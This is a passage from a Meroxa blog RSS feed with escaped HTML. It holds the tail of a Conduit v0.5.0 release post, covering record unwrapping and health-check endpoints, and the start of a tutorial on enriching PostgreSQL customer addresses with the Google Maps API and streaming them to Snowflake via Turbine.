        Before&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;StructuredData&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        After&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;description&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;test2&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Key&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;(2)&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    Operation&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;OperationSnapshot&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Payload&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Change&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        After&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;description&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;test2&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Key&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Note that the `Payload.After` is unwrapped to be the whole record, and the payload from the `Key` is unwrapped too.&lt;/p&gt;
&lt;h2&gt;Implement health check&lt;/h2&gt;
&lt;p&gt;The Conduit Health Check can be used to determine if Conduit is running correctly. It determines if Conduit can successfully connect to the database with which it was setup (which can be BadgerDB, PostgreSQL, or the in-memory one). Here’s an example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;http://localhost:8080/healthz&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token output&quot;&gt;{&quot;status&quot;:&quot;SERVING&quot;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can also check individual services within Conduit. The following example checks if the PipelineService is running:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;http://localhost:8080/healthz?service=PipelineService&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token output&quot;&gt;{&quot;status&quot;:&quot;SERVING&quot;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;And the rest&lt;/h2&gt;
&lt;p&gt;If you want to see the full list of what was included in this release, check out the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.5.0&quot;&gt;Conduit Changelog&lt;/a&gt; and the &lt;a href=&quot;https://docs.conduit.io/docs/introduction/getting-started/&quot;&gt;documentation&lt;/a&gt;. Also, feel free to join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Transformation Part I: Using Meroxa & Google Maps API to enrich & load data into Snowflake in Real-Time]]></title><description><![CDATA[Learn how to use the Meroxa Platform along with the Turbine Framework to transform, enrich, orchestrate, & analyze data in real-time.]]></description><link>https://meroxa.com/blog/transformation-series-part-i</link><guid isPermaLink="false">https://meroxa.com/blog/transformation-series-part-i</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Wed, 22 Feb 2023 16:02:38 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-js-examples/tree/master/postgres-snowflake-google-maps-enrich&quot;&gt;Github Repo&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Welcome to Part I of our Transformation series. In this series, we will show you how to use the Meroxa Platform in conjunction with the Turbine Framework to transform, enrich, orchestrate, and analyze data in real-time.&lt;/p&gt;
&lt;p&gt;Throughtout the series, we will use a PostgreSQL database with a table called &quot;customers&quot; that has information about our customers and the orders they have made. We will be doing many transformations to enrich this data set in real-time to understand better where our customers are from, engage with them, and visualize our data.&lt;/p&gt;
&lt;p&gt;In part I, we will do address enrichment by leveraging the Google Maps API to enrich and validate existing customer address data. Street address locations may have typos, spelling variations, misspellings, and other errors. Google Maps is one of the best sources of location-based addresses; hence, it was chosen as a source of data enhancement and enrichment. Later, we will use this data to plot demographic insights on our customers for business analytics.&lt;/p&gt;
&lt;h2&gt;What is Meroxa?&lt;/h2&gt;
&lt;p&gt;Meroxa is a Stream Processing Application Platform as a Service (SAPaaS) where developers can run Turbine applications. Turbine is Meroxa&apos;s stream processing application framework for building event-driven stream processing apps that respond to data in real-time and scales using cloud-native best practices. Meroxa handles the underlying streaming infrastructure so developers can focus on building the applications. Turbine applications start with an upstream resource. Once that upstream resource is connected, Meroxa will take care of streaming the data into the Turbine application so it can be run. Since Meroxa is a developer first platform, engineers can ingest, orchestrate, transform, and stream data to and from anywhere using languages they already know, such as &lt;strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-go&quot;&gt;Go&lt;/a&gt;&lt;/strong&gt;, &lt;strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-js&quot;&gt;JavaScript&lt;/a&gt;&lt;/strong&gt;, &lt;strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-py&quot;&gt;Python&lt;/a&gt;&lt;/strong&gt;, or &lt;a href=&quot;https://meroxa.com/blog/meroxa-now-streaming-on-ruby&quot;&gt;&lt;strong&gt;Ruby&lt;/strong&gt;&lt;/a&gt;. Support for Java, and C# is also on the way.&lt;/p&gt;
&lt;p&gt;💡 Meroxa has support for many source and destination resources. You can see which resources are supported &lt;a href=&quot;https://meroxa.com/integrations/&quot;&gt;here&lt;/a&gt;. If there&apos;s a resource not listed you can request it by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;. Meroxa is capable of supporting &lt;strong&gt;any&lt;/strong&gt; data resource as a connector.&lt;/p&gt;
&lt;h2&gt;Overview&lt;/h2&gt;
&lt;p&gt;To get started with enriching and collecting metadata on our customers’ addresses, we will be leveraging the Google Maps geocoding API. If you are unfamiliar with this API, you can check out the Google Maps documentation &lt;a href=&quot;https://developers.google.com/maps&quot;&gt;here&lt;/a&gt;. We will use the search API to send in customer address information, which will return a more comprehensive object on the address, such as latitude and longitude.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Transformation%20Series%20Part%20I%20-%20Image%201.png&quot; alt=&quot;Transformation Series Part I - Flowchart 1 PostgreSQL to Meroxa  to enrich address data then to SnowflakeImage 1&quot;&gt;&lt;/p&gt;
&lt;p&gt;At a high level, Meroxa will detect changes in your PostgreSQL database via Change Data Capture (CDC). Each record from PostgreSQL will be streamed over to our Turbine application in real-time. In our case, it will take the address and enrich it via the Google Maps API. Once the record has been processed, it will be written to Snowflake.&lt;/p&gt;
&lt;h2&gt;Take Me To The Code!&lt;/h2&gt;
&lt;p&gt;To start, you will need the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.youtube.com/watch?v=HNavKF7yxe4&quot;&gt;Snowflake Credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nodejs.org/en/&quot;&gt;Node JS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Once you have signed up for &lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa&lt;/a&gt; and set up the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt; you can follow the following steps to get up and running:&lt;/p&gt;
&lt;p&gt;💡 Here we are creating the resources via the CLI, you can also do so via the &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Meroxa Dashboard&lt;/a&gt; once you are logged in.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Adding your PostgreSQL and Snowflake Resources&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PostgreSQL&lt;/strong&gt; (&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Guide on configuring PostgreSQL&lt;/a&gt;) - Source Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a PostgreSQL connection to Meroxa named &lt;code class=&quot;language-text&quot;&gt;pg_db&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Note: To support CDC (Change Data Capture) we turn on the &lt;code class=&quot;language-text&quot;&gt;logical_replication&lt;/code&gt; flag.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;--type postgres \\\\
--url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \\\\
--metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Snowflake&lt;/strong&gt; (&lt;a href=&quot;https://www.youtube.com/watch?v=HNavKF7yxe4&quot;&gt;Guide on setting up Snowflake&lt;/a&gt;) - Destination Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a Snowflake connection named &lt;code class=&quot;language-text&quot;&gt;snowflake&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create snowflake &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;--type snowflakedb \\\\
--url &quot;snowflake://$SNOWFLAKE_URL/meroxa_db/stream_data&quot; \\\\
--username meroxa_user \\\\
--password $SNOWFLAKE_PRIVATE_KEY&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Initializing Turbine&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init part-one-google-maps-enrichment &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; js&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Writing your Turbine code&lt;/p&gt;
&lt;p&gt;Open up your &lt;code class=&quot;language-text&quot;&gt;part-one-google-maps-enrichment&lt;/code&gt; folder in your preferred IDE. You will get boilerplate code that explains where to code your sources and destinations named in Step 1. In our case we just need to do the following to set the connection between PostgreSQL and Snowflake:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// First, identify your PostgreSQL source name as configured in Step 1&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// In our case we named it pg_db&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Second, specify the table you want to read in your PostgreSQL DB&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customers&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

	&lt;span class=&quot;token comment&quot;&gt;// Optional, Process each record that comes in!&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; transformed &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;transform&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Third, identify your Snwoflake source name configured in Step 1&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;snowflake&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Finally, specify which table to write that data to&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;transformed&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;customer_addresses_enriched&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;await turbine.tranform&lt;/code&gt; allows developers to write a function that will be run on each record. We will preprocess our data before sending it to Snowflake. Below we have our &lt;code class=&quot;language-text&quot;&gt;transform&lt;/code&gt; function, which loops through each record coming in from the data stream. We are calling the Google Maps API on the address field of every record and generating an address object that contains metadata on the address. Later we write that metadata in a new table to Snowflake.&lt;/p&gt;
&lt;p&gt;💡 You can view the complete repository for this data app on Github &lt;a href=&quot;https://github.com/meroxa/turbine-js-examples/tree/master/postgres-snowflake-google-maps-enrich&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;transform&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; record &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      	&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; customer_address &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customer_address&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;[DEBUG] customer_address ===&gt; &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; customer_address&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

      	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;customer_address &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; customer_address&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;length &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        	console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;[ERR] customer_address ===&gt; &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; customer_address&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;
      	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

